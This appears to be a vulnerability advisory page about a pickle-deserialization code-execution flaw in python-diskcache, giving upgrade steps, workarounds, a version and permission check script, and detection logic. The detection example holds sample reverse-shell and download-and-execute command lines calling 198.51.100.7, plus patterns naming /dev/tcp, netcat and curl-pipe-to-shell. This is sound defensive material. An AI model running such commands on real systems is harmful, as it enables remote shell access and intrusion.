CVE-2025-69872
📋 TL;DR
This vulnerability in DiskCache (python-diskcache) allows arbitrary code execution: an attacker who can write to a cache directory plants malicious pickle data, and the victim application deserializes it the next time it reads that entry, running the attacker's code with the application's privileges. All applications using python-diskcache versions through 5.6.3 with the default pickle serialization are affected.
💻 Affected Systems
- python-diskcache (DiskCache)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine whether your system is affected.
Why? The CVE database entry does not specify which versions are vulnerable (no version ranges were provided by the vendor or NVD), so verify manually:
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining the same privileges as the application process, potentially leading to data theft, lateral movement, or ransomware deployment.
Likely Case
Local privilege escalation or remote code execution on multi-user systems where the cache directory is shared between users or is writable through a web application.
If Mitigated
Limited impact if the cache directory is writable only by the application user and no untrusted user or service on the host can reach it.
🎯 Exploit Status
Exploitation requires write access to the cache directory and a subsequent read of the planted entry by the victim application. No authentication bypass is needed beyond that directory access.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.6.4 or later
Vendor Advisory: https://github.com/grantjenks/python-diskcache
Restart Required: Application processes only (no system reboot); a running interpreter keeps the old module loaded until it is restarted.
Instructions:
1. Upgrade python-diskcache: pip install --upgrade diskcache
2. Verify version: python -c "import diskcache; print(diskcache.__version__)"
3. Restart affected applications to load new version.
🔧 Temporary Workarounds
Use the JSON serializer instead of pickle
All platforms: Configure DiskCache to use its JSONDisk, which encodes keys and values with json and zlib instead of pickle. Note that Cache has no serializer= argument; the serializer is chosen through the disk= parameter:
from diskcache import Cache, JSONDisk
cache = Cache('/path/to/cache', disk=JSONDisk)
JSONDisk only accepts JSON-serializable keys and values, and it changes only what your own application writes; it does not remove the pickle code path from the library, so keep the directory permissions below as the primary control.
Secure cache directory permissions
Linux/Unix: Restrict the cache directory to the application user so no other user or process can write to it. The directory holds the SQLite database and any spilled value files, so mode 700 on the directory itself blocks access to both. Also make sure no parent directory is writable by untrusted users, since a writable parent would let them replace the cache directory outright:
chown appuser:appgroup /path/to/cache
chmod 700 /path/to/cache
🧯 If You Can't Patch
- Implement strict file permissions on cache directories (read/write only for the application user)
- Make sure nothing outside the application (other users, shared volumes, upload handlers, co-located services) can write to the cache directory
- Monitor the cache directory for file modifications by anything other than the application process
- Consider using an in-memory cache instead of the disk cache if feasible
🔍 How to Verify
Check if Vulnerable:
You are affected if python-diskcache ≤ 5.6.3 is installed and any Cache is created with the default Disk (pickle) serializer, i.e. without disk=JSONDisk or another non-pickle Disk
Check Version:
python -c "import diskcache; print(diskcache.__version__)"
Verify Fix Applied:
Verify that the python-diskcache version is ≥ 5.6.4, and that the cache either uses a non-pickle serializer or lives in a directory writable only by the application user
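An added verification helper, written for this page and not part of python-diskcache, that turns the three checks above into functions you can run inside the application's environment. It assumes the patch version quoted in this advisory (5.6.4), reads the installed version from package metadata, inspects a Cache's disk attribute (falling back to the private _disk, which is an assumption about the library's internals), and mirrors the chmod 700 / chown recommendation with an os.stat check. The diskcache import is lazy so the version and permission checks also run where the package is absent.

```python
import os
import re
import stat
import tempfile
from importlib import metadata

FIXED_VERSION = (5, 6, 4)   # patch version quoted in this advisory


def parse_version(text):
    """'5.6.3' -> (5, 6, 3), comparing leading numeric components only.

    A pre-release suffix such as '5.6.4rc1' is truncated to (5, 6, 4), so
    treat pre-releases with care if your environment installs them.
    """
    parts = []
    for piece in text.split('.'):
        match = re.match(r'\d+', piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def version_is_fixed(text, fixed=FIXED_VERSION):
    """True when the given version is at or above the patched release."""
    return parse_version(text) >= fixed


def installed_diskcache_version():
    """Version string of the installed 'diskcache' distribution, or None."""
    try:
        return metadata.version('diskcache')
    except metadata.PackageNotFoundError:
        return None


def serializer_of(cache):
    """'pickle' for the default Disk, 'json' for JSONDisk, else the class name.

    Takes a Cache object; for FanoutCache, Deque or Index pass the
    underlying Cache. Uses the public 'disk' attribute and falls back to the
    private '_disk' (assumption about the library's internals).
    """
    from diskcache import Disk, JSONDisk   # lazy: other checks work without diskcache

    disk = getattr(cache, 'disk', None) or getattr(cache, '_disk')
    if isinstance(disk, JSONDisk):
        return 'json'
    if type(disk) is Disk:
        return 'pickle'
    return type(disk).__name__


def cache_dir_locked_down(path):
    """Mirror of the chmod 700 / chown recommendation for a Unix host.

    The directory must exist, be owned by the effective user running this
    check (run it as the application user) and grant no group/other bits.
    """
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return (stat.S_ISDIR(st.st_mode)
            and st.st_uid == os.geteuid()
            and (st.st_mode & 0o077) == 0)


def demo_permission_check():
    """Two throwaway directories: one locked down (mkdtemp uses 0o700), one 0o755."""
    good = tempfile.mkdtemp()
    bad = tempfile.mkdtemp()
    os.chmod(bad, 0o755)
    return cache_dir_locked_down(good), cache_dir_locked_down(bad)


def report(cache_dir, cache=None):
    """Collect the checks this advisory asks for into one dict."""
    version = installed_diskcache_version()
    result = {
        'installed_version': version,
        'version_fixed': bool(version) and version_is_fixed(version),
        'cache_dir_locked_down': cache_dir_locked_down(cache_dir),
    }
    if cache is not None:
        result['serializer'] = serializer_of(cache)
    return result


if __name__ == '__main__':
    import sys
    print(report(sys.argv[1] if len(sys.argv) > 1 else '/path/to/cache'))
```

Run report() as the application user with the real cache directory and, where possible, the application's own Cache instance; a result of version_fixed False with serializer 'pickle' and cache_dir_locked_down False is the fully exposed case.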
📡 Detection & Monitoring
Log Indicators:
- Python application processes spawning shells or network tools
- Writes to the cache directory by users or processes other than the application
- Unpickling errors (UnpicklingError, unexpected TypeError on cache reads) in application logs, which can indicate tampered entries; note that a successful payload raises no error
Network Indicators:
- Unusual outbound connections from application processes
- Command and control traffic patterns
SIEM Query:
Process creation where the parent process is the Python application AND (the child is a shell OR the command line contains suspicious patterns such as reverse-shell redirections, download-and-execute pipelines, or encoded payloads)
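The SIEM query above expressed as runnable detection logic, added here as an example and not taken from any product. The telemetry records are constructed for this page in a generic EDR-like shape (the field names host, parent_image, image and cmdline are the example's own, not a specific SIEM schema); two of them are the kind of child process a payload delivered through pickle typically spawns, the others are benign noise such as multiprocessing workers and subprocess.run(shell=True).

```python
import os
import re

# Constructed process-creation telemetry (not from a real system).
SAMPLE_EVENTS = [
    {'host': 'web-1', 'parent_image': '/usr/bin/python3', 'image': '/usr/bin/python3',
     'cmdline': '/usr/bin/python3 -m multiprocessing.forkserver'},
    {'host': 'web-1', 'parent_image': '/usr/bin/python3', 'image': '/bin/sh',
     'cmdline': "/bin/sh -c 'curl http://198.51.100.7/x | sh'"},
    {'host': 'web-2', 'parent_image': '/usr/bin/python3', 'image': '/usr/bin/git',
     'cmdline': 'git rev-parse HEAD'},
    {'host': 'web-2', 'parent_image': '/usr/bin/python3', 'image': '/bin/bash',
     'cmdline': 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'},
    {'host': 'web-3', 'parent_image': '/usr/bin/python3.11', 'image': '/bin/sh',
     'cmdline': "/bin/sh -c 'ls -la /tmp'"},
    {'host': 'db-1', 'parent_image': '/usr/sbin/cron', 'image': '/bin/sh',
     'cmdline': '/bin/sh -c /usr/local/bin/backup.sh'},
]

# Parent must be a Python interpreter: python, python3, python3.11, ...
PYTHON_IMAGE = re.compile(r'(^|/)python(\d(\.\d+)?)?$')
SHELLS = {'sh', 'bash', 'dash', 'zsh', 'ksh'}
# Command-line patterns that are suspicious on their own.
HIGH_CONFIDENCE = [
    (re.compile(r'/dev/tcp/'), 'bash reverse shell'),
    (re.compile(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b'), 'download and execute'),
    (re.compile(r'\bnc\b.*\s-e\s'), 'netcat with -e'),
    (re.compile(r'base64\s+(-d|--decode)'), 'base64-decoded payload'),
    (re.compile(r'import\s+(socket|pty|subprocess)'), 'inline python shell/network code'),
]


def classify(event):
    """Return an alert dict for a suspicious event, or None."""
    if not PYTHON_IMAGE.search(event['parent_image']):
        return None                       # rule only covers Python parents
    child = os.path.basename(event['image'])
    reasons = [label for pattern, label in HIGH_CONFIDENCE
               if pattern.search(event['cmdline'])]
    severity = 'high' if reasons else None
    if not reasons and child in SHELLS:
        # subprocess.run(..., shell=True) is common, so a bare shell child
        # is only a low-severity signal to tune against the app's baseline.
        reasons.append('shell spawned by python')
        severity = 'low'
    if not reasons:
        return None
    return {'host': event['host'], 'severity': severity,
            'cmdline': event['cmdline'], 'reasons': reasons}


def detect(events):
    """Apply classify() to a stream of events and keep the alerts, in order."""
    return [alert for alert in map(classify, events) if alert]


if __name__ == '__main__':
    for alert in detect(SAMPLE_EVENTS):
        print(alert['severity'].upper(), alert['host'], alert['reasons'], '->', alert['cmdline'])
```

Tune HIGH_CONFIDENCE and SHELLS to the application's real baseline before alerting on the low-severity branch; the high-severity patterns are the ones worth paging on from a process whose parent is the cache-reading application.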